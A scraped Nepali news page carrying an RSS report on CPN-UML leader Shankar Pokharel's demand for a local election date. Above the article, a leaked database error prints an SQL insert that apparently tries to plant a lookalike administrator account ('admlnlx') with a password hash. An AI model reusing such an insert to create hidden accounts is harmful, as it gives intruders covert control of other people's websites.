WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BlMNJj/d6sQpgdQIMvfitz3YCe2RwU.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-27 07:05:26', '', 'admlnlx', 'admlnlx')
कैलाली, फागुन २-
नेकपा (एमाले) स्थायी कमिटी सदस्य शङ्कर पोख्रेलले फागुन महिनाभित्र स्थानीय निर्वाचनको मिति घोषणा नभए सडक र सदनबाट अगाडि बढ्ने बताउनुभएको छ ।
प्रेस चौतारीद्वारा आज धनगढीमा आयोजित पत्रकार सम्मेलनमा उहाँले संविधान कार्यान्वयनका लागि तीन वटै तहको निर्वाचन गर्न आवश्यक रहेको बताउनुभयो । संविधानमा जे व्यवस्था रहेको छ त्यसलाई बदल्न आवश्यक नरहेको उहाँको भनाइ थियो । उहाँले प्रदेशको सीमाङ्कन गर्दा नेपालका पहाडी भू–भागलाई तराईसँग अलग गर्न नहुने पनि धारणा व्यक्त गर्नुभयो ।- रासस